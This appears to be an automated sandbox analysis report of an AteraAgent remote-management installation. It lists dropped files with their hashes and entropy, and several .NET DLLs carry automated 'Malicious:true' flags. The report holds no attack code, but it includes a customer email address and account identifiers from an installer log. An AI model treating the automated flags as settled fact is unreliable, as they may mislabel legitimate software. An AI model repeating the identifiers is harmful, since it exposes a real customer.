                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1442
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                                                                              MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                                                                              SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                                                                              SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                                                                              SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3318832
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                                                                              MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                                                                              SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                                                                              SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                                                                              SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):215088
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                                                                              MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                                                                              SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                                                                              SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                                                                              SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710192
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                                                                              MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                                                                              SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                                                                              SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                                                                              SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):602672
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                                                                              MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                                                                              SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                                                                              SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                                                                              SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73264
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                                                                              MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                                                                              SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                                                                              SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                                                                              SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):261
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.167458100356664
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:AIilND9w3pKFSQcKshMQkOlCgDp7OgRDX:9iSMSQcwOYsp6gX
                                                                                                                                                                                                                                                                                              MD5:6090DAC6BD4453F6568436B37E915FEB
                                                                                                                                                                                                                                                                                              SHA1:BBB5B92049BBD78D8AC37C6D5B35DAEAD0959B7E
                                                                                                                                                                                                                                                                                              SHA-256:86FF69773FB439A2460747E487C5B61468C84385E967404C552A7B182721CD22
                                                                                                                                                                                                                                                                                              SHA-512:64D2AE3935F30A04A3A31B82800912066CD9AD186CC7A46D976F8796550D9CB8CE2AA5B3A041E6B07034E6E2072289D4263A8BAFC273CE82F079FA7C205876DE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:/i /IntegratorLogin=contato@fazendadoscordeiros.com.br /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000P2oAPIAZ /AgentId=52187e48-563c-468d-9785-3542f81fb412.06/01/2025 06:58:08 Trace Starting..06/01/2025 06:58:32 Trace Starting..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.302048312078957
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:5PbTsIvBxC2yrVQ3pxOLKQl6UgMHwiridk6Y4mWDShTufrsf3J2MzqRI+OPkvOy:RbTpJxO80LhlRgMHRidk6JmWDShTuj2G
                                                                                                                                                                                                                                                                                              MD5:20A0D9588ED3729111B94607198FFC68
                                                                                                                                                                                                                                                                                              SHA1:475AD1C0CF64ED9653A00A8F1B1943C7CEB23520
                                                                                                                                                                                                                                                                                              SHA-256:BCA9A7D641BFDBFDF1F133EC1FADF3CA3611602A47AFE550A0D14A722529E80A
                                                                                                                                                                                                                                                                                              SHA-512:D8F4076B7E3237985FB4A14B9FA7AD3F5A70158C0D75D1B07AC972C42961077124C6B017271329685CCF3110CE6C47781A95CE97F44A35CA2251FC47FF89EBD0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:eyJJZCI6ImFjZjhlYmZjLWM0ZDctNGFkMS05NjNjLTYzNzBiNTQyYmM0ZCIsIkNyZWF0ZWQiOiIyMDI1LTAxLTA2VDA2OjU5OjE0LjU3Nzg1MDUtMDU6MDAiLCJNZXNzYWdlIjoiX0lOSVRfIiwiVGltZW91dCI6IjAwOjAxOjAwIn0=..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):261
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.167458100356664
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:AIilND9w3pKFSQcKshMQkOlCgDp7OgRDX:9iSMSQcwOYsp6gX
                                                                                                                                                                                                                                                                                              MD5:6090DAC6BD4453F6568436B37E915FEB
                                                                                                                                                                                                                                                                                              SHA1:BBB5B92049BBD78D8AC37C6D5B35DAEAD0959B7E
                                                                                                                                                                                                                                                                                              SHA-256:86FF69773FB439A2460747E487C5B61468C84385E967404C552A7B182721CD22
                                                                                                                                                                                                                                                                                              SHA-512:64D2AE3935F30A04A3A31B82800912066CD9AD186CC7A46D976F8796550D9CB8CE2AA5B3A041E6B07034E6E2072289D4263A8BAFC273CE82F079FA7C205876DE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:/i /IntegratorLogin=contato@fazendadoscordeiros.com.br /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000P2oAPIAZ /AgentId=52187e48-563c-468d-9785-3542f81fb412.06/01/2025 06:58:08 Trace Starting..06/01/2025 06:58:32 Trace Starting..
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):145968
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                                                                              MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                              SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                                                                              SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                                                                              SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1442
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                                                                              MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                                                                              SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                                                                              SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                                                                              SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3318832
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                                                                              MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                                                                              SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                                                                              SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                                                                              SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):215088
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                                                                              MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                                                                              SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                                                                              SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                                                                              SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710192
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                                                                              MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                                                                              SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                                                                              SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                                                                              SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):602672
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                                                                              MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                                                                              SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                                                                              SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                                                                              SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73264
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                                                                              MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                                                                              SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                                                                              SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                                                                              SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2402
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.362731083469072
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQg8mHDp684IHTQ06YHKGSI6oPtHTHhAHKKk+HKlT4v1qHGIs0HKaHKmTHlH7:iqzCIzQ06YqGSI6oPtzHeqKk+qZ4vwme
                                                                                                                                                                                                                                                                                              MD5:28B4BFE9130A35038BD57B2F89847BAE
                                                                                                                                                                                                                                                                                              SHA1:8DBF9D2800AB08CCA18B4BA00549513282B774A9
                                                                                                                                                                                                                                                                                              SHA-256:19F498CAE589207075B8C82D7DACEAE23997D61B93A971A4F049DC14C8A3D514
                                                                                                                                                                                                                                                                                              SHA-512:02100FD4059C4D32FBAAA9CEAACB14C50A4359E4217203B2F7A40E298AD819ED5469F2442291F12852527A2B7109CC5F7BFF7FDAD53BA5ABF75FC5F0474E984F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\434f871c532673e1359654ad68a1c225\System.Configuration.Install.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\a
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):651
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.343677015075984
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
                                                                                                                                                                                                                                                                                              MD5:7EEF860682F76EC7D541A8C1A3494E3D
                                                                                                                                                                                                                                                                                              SHA1:58D759A845D2D961A5430E429EF777E60C48C87E
                                                                                                                                                                                                                                                                                              SHA-256:65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
                                                                                                                                                                                                                                                                                              SHA-512:BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2994176
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.878673655295741
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:a+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:a+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                                              MD5:7CE6669643890D209540D68E76C0CFCC
                                                                                                                                                                                                                                                                                              SHA1:C49DF2E823D5E2461A11C96AD4D36974C7FFFC9A
